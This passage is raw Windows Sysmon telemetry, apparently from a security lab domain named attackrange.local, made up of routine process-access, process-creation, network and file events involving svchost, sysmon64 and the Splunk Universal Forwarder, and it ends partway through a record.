09:20:26.306{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980565Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.306{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980564Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.306{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8CDA-6151-007A-00000000FD01}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980563Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.306{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980562Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.306{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980561Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.306{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8CDA-6151-007A-00000000FD01}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980560Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.306{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980559Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.306{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980558Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.306{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980557Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.306{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980556Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.306{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980555Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.290{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8CDA-6151-007A-00000000FD01}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980554Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.260{69CF5F33-8CDA-6151-007A-00000000FD01}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001054271Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:24.891{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59684-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000980598Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:27.900{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8EA2170DCF17748A8D132A5BC9BE836,SHA256=159C048A73DA83782A0191BA120A38248300B4C37F3F21D2CBF7432BAC941A37,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980597Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:27.743{69CF5F33-8CDB-6151-027A-00000000FD01}18961888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980596Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:27.587{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8CDB-6151-027A-00000000FD01}1896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980595Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:27.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980594Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:27.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980593Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:27.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980592Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:27.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980591Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:27.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980590Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:27.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980589Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:27.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980588Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:27.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980587Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:27.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980586Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:27.587{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8CDB-6151-027A-00000000FD01}1896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980585Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:27.587{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8CDB-6151-027A-00000000FD01}1896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 